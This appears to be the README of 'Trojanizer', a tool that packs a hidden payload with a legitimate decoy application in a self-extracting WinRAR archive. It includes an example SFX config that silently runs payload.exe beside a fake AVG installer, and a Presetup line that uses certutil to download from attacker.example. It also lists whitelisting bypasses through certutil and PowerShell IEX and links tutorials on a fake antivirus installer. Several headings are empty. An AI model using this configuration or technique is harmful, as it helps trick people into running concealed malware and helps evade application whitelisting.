TROJANIZER
FRAMEWORK DESCRIPTION
'Trojanizer will not build trojans, but from the target's perspective it replicates the trojan behavior'
(the payload executes in the background while the legit application executes in the foreground).
DEPENDENCIES (backend applications)
PAYLOADS (agents) ACCEPTED
LEGIT APPLICATIONS ACCEPTED (decoys)
ADVANCED SETTINGS
-- Presetup advanced option
Trojanizer can be configured to execute a program plus a command before the extraction/execution of the two compressed files (SFX archive). This lets users take advantage of software pre-installed on the target to run a remote command before the actual extraction occurs. Because Presetup runs before anything is extracted, the command can only rely on binaries already present on the target, not on the files inside the archive. If this option is active, Trojanizer asks (zenity dialog) for the command to be executed.
-- single_file_execution
Consider the following scenario: you have a DLL payload that needs to be executed upon extraction, but SFX archives cannot execute DLL files directly. This setting lets users supply one batch script (.bat) that will be used to execute the DLL payload. All Trojanizer needs to do is instruct the SFX archive to extract both files and then execute script.bat. Note that in this mode only the script runs; there is no decoy application in the foreground, which is why the video below calls it "not trojan behavior".
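To make the two settings above concrete, here are the two modes written as WinRAR SFX comment scripts (the kind of file Trojanizer calls xsf.conf). This is an added illustration, not the file Trojanizer generates: the file names, the extraction path, the placeholder host in the Presetup line and the DLL entry point are assumptions for the example. The keywords themselves (Path, Silent, Overwrite, Setup, Presetup) are the ones documented in the WinRAR SFX manual listed under References; comment lines start with a semicolon.

```ini
; ---------------------------------------------------------------
; Mode 1: trojan behavior - both files are executed after extraction
; Added example, not Trojanizer's generated xsf.conf. Names are placeholders.
; ---------------------------------------------------------------
; Destination folder for the extracted files (placeholder path).
Path=%TEMP%\avg_setup
; Hide the SFX start dialog so the target only sees the decoy.
Silent=1
; Overwrite existing files without prompting.
Overwrite=1
; Several Setup lines are allowed; each program is started after extraction.
; payload.exe is the agent, avg_installer.exe the legit decoy application.
Setup=payload.exe
Setup=avg_installer.exe

; ---------------------------------------------------------------
; Mode 2: single_file_execution + Presetup
; The archive carries payload.dll and script.bat; only script.bat is launched.
; ---------------------------------------------------------------
Path=%TEMP%\avg_setup
Silent=1
Overwrite=1
; Presetup runs BEFORE extraction, so it can only use software already on
; the target. This is the certutil variant named in the screenshot captions;
; attacker.example and stage.txt are placeholders for the example.
Presetup=certutil.exe -urlcache -split -f http://attacker.example/stage.txt %TEMP%\stage.txt
; SFX cannot execute a DLL directly, so the batch script does it, e.g. with
; rundll32 payload.dll,EntryPoint (EntryPoint is a placeholder export name).
Setup=script.bat
```

When reviewing a suspicious SFX archive, these are the lines to look for: more than one Setup entry, any Presetup entry, and Silent/Overwrite set together are the configuration footprint of the behavior this page describes.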
TROJANIZER AND APPL WHITELISTING BYPASSES
DOWNLOAD/INSTALL
Framework Screenshots
xsf.conf - execute both files upon extraction (trojan behavior)
xsf.conf - single_file_execution + Presetup (advanced options)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)
Final sfx archive with icon changed
Inside the sfx archive (open with winrar) - trojan behavior
Inside the sfx archive (open with winrar) - single_file_execution
Video tutorials
Trojanizer - AVG anti-virus fake installer (trojan behavior)
https://www.youtube.com/watch?v=BIn6_ccZrI0
Trojanizer - single_file_execution (not trojan behavior)
https://www.youtube.com/watch?v=Ze0JkVtKbns
Special thanks:
@subTee | @enigma0x3 | @H4d3s (SSA)
References:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/